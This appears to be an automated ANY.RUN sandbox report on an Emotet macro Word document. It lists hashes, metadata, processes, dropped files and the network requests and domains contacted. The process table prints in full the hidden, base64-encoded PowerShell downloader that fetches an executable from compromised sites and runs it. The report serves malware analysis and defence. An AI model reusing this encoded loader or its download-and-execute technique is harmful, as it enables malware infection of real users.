analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

KIE-120119 SBT-120219.doc

Full analysis: https://app.any.run/tasks/00b9179f-ae77-4e6b-bfa6-8a589a7c8fec
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 02, 2019, 17:51:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Rerum laboriosam velit., Author: Lino Paesler, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 2 13:50:00 2019, Last Saved Time/Date: Mon Dec 2 13:50:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 335, Security: 0
MD5:

C673AFB2D637F916BE6967E2D3F5620B

SHA1:

2864393C11B69B15F8F9421331C324FF9BE693AB

SHA256:

7F1426A921EB0EA9A4C4C389B612B5D7D1BC0888A1C8B8C8B4FCE262AF5A4B5D

SSDEEP:

6144:WdxAgux1s/QSn62k4ytGiL3HJkwyD7bagJ5iuadX:WdxAgux1s/QSn6rQitkb7baI5iuadX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2928)
    • Creates files in the user directory

      • powershell.exe (PID: 2928)
    • Executed via WMI

      • powershell.exe (PID: 2928)
  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 2928)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 944)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Forms 2.0 Form
CompObjUserTypeLen: 25
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 392
Paragraphs: 1
Lines: 2
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 335
Words: 58
Pages: 1
ModifyDate: 2019:12:02 13:50:00
CreateDate: 2019:12:02 13:50:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Lino Paesler
Subject: -
Title: Rerum laboriosam velit.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
944"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\KIE-120119 SBT-120219.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2928powershell -w hidden -en JABKAHoAcQBjAHoAdwBpAGQAYQB5AG8APQAnAFUAbQByAHoAdgB2AG8AZwAnADsAJABRAGUAbwBjAGcAegB5AGMAdgAgAD0AIAAnADEAMQA4ACcAOwAkAFUAcQBuAHgAcABmAG0AeQBnAGQAZwBuAD0AJwBDAHUAdgBvAGYAaQBjAGkAbQBoAHUAJwA7ACQAVABtAHIAcABtAGYAcwBjAHEAZQBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABRAGUAbwBjAGcAegB5AGMAdgArACcALgBlAHgAZQAnADsAJABHAGEAcQBoAGcAdQB5AGgAaQBqAGwAbgB1AD0AJwBQAHkAbgB5AGMAaQB0AGEAdAByAHgAJwA7ACQASAB5AG0AcgBsAHoAYgBlAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAHcAZQBiAGMATABJAGUATgBUADsAJABTAGQAbgBoAGkAdABrAHoAdwBzAD0AJwBoAHQAdABwADoALwAvAHMAZQB3AGEAcAByAGkAbgB0AGUAcgAuAGcAcgBhAHQAaQBzAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGQAdgBDAEMAcwBWAEUAUgBVAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZgBpAHIAZQBwAHUAbABzAGUAcwBwAG8AcgB0AHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AcwA2AGoANAAtADUAOAB2AG0AOQB4AHgANgAtADgANQA5ADMANAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AdwBpAGwAbABtAGUAcgBvAHQAaAAuAG8AcgBnAC8AdQBsAHIAaQBrAGUAbgBlAHUAXwBiAGEAawAvAHQAZgBpAGgANwB0ADcALQA0AGwAagByAC0AOQAyADEAMAA3ADYAOAA5ADIALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AeQByAGEAZABpAHUAcwAuAGUAdQAvAGEAcABwAC8AcQBmAFgASwBaAEQAWQBwAFMALwAqAGgAdAB0AHAAOgAvAC8AZQBkAHUAYwBhAHQAbwByAHMALgBwAGwAdQBzAC8AdAA0AHEAZQB6AGYAagAvAHIAawBTAGcAawBGAC8AJwAuACIAUwBwAEwAYABpAFQAIgAoACcAKgAnACkAOwAkAEwAZQBmAGQAaABnAGcAeABxAHYAYQA9ACcASQB0AGsAawBhAGsAeABsAHQAbwB0ACcAOwBmAG8AcgBlAGEAYwBoACgAJABUAHkAaQBsAGoAegBlAHAAZABwACAAaQBuACAAJABTAGQAbgBoAGkAdABrAHoAdwBzACkAewB0AHIAeQB7ACQASAB5AG0AcgBsAHoAYgBlAC4AIgBkAE8AVwBuAGAAbABvAGEARABmAGAASQBsAGUAIgAoACQAVAB5AGkAbABqAHoAZQBwAGQAcAAsACAAJABUAG0AcgBwAG0AZgBzAGMAcQBlAHMAKQA7ACQAUABuAHoAeABwAGkAeABpAHYAPQAnAEgAZwBuAGUAcwB5AGMAbgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAFQAbQByAHAAbQBmAHMAYwBxAGUAcwApAC4AIgBMAGUAbgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA3ADgANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAVAAiACgAJABUAG0AcgBwAG0AZgBzAGMAcQBlAHMAKQA7ACQAWgBwAGkAcQBtAHkAZABzAHEAbABoAGIAcgA9ACcAUwBmAHIAdgBpAG4AcABoAGMAdQB4AHMAdAAnADsAYgByAGUAYQBrADsAJABHAHEAdABwAG8AagBvAHkAdwB6AD0AJwBPAHMAYQBlAHcAbQB0AGcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBlAG0AagBpAGcAdwBwAGYAawB4AGUAZgA9ACcAQgBkAHAAZABoAHYAdwBkAGoAYgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
963
Read events
740
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA850.tmp.cvr
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF6E80FE.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88CFC0E7.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FF7D5BC.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE1AC28D.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0A50F2A.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7868123.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95B380C8.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2F53A29.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79A14A16.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2928
powershell.exe
GET
404
107.180.46.212:80
http://www.firepulsesports.com/wp-content/uploads/s6j4-58vm9xx6-85934/
US
xml
345 b
suspicious
2928
powershell.exe
GET
404
103.253.115.37:80
http://sewaprinter.gratis/wp-content/dvCCsVERU/
ID
xml
345 b
suspicious
2928
powershell.exe
GET
404
69.164.215.150:80
http://educators.plus/t4qezfj/rkSgkF/
US
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2928
powershell.exe
134.119.45.67:443
www.myradius.eu
Host Europe GmbH
DE
suspicious
2928
powershell.exe
217.11.48.124:443
www.willmeroth.org
manitu GmbH
DE
unknown
2928
powershell.exe
69.164.215.150:80
educators.plus
Linode, LLC
US
suspicious
2928
powershell.exe
107.180.46.212:80
www.firepulsesports.com
GoDaddy.com, LLC
US
suspicious
2928
powershell.exe
103.253.115.37:80
sewaprinter.gratis
Media Antar Nusa PT.
ID
suspicious

DNS requests

Domain
IP
Reputation
sewaprinter.gratis
  • 103.253.115.37
suspicious
www.firepulsesports.com
  • 107.180.46.212
suspicious
www.willmeroth.org
  • 217.11.48.124
unknown
www.myradius.eu
  • 134.119.45.67
suspicious
educators.plus
  • 69.164.215.150
suspicious

Threats

No threats detected
No debug info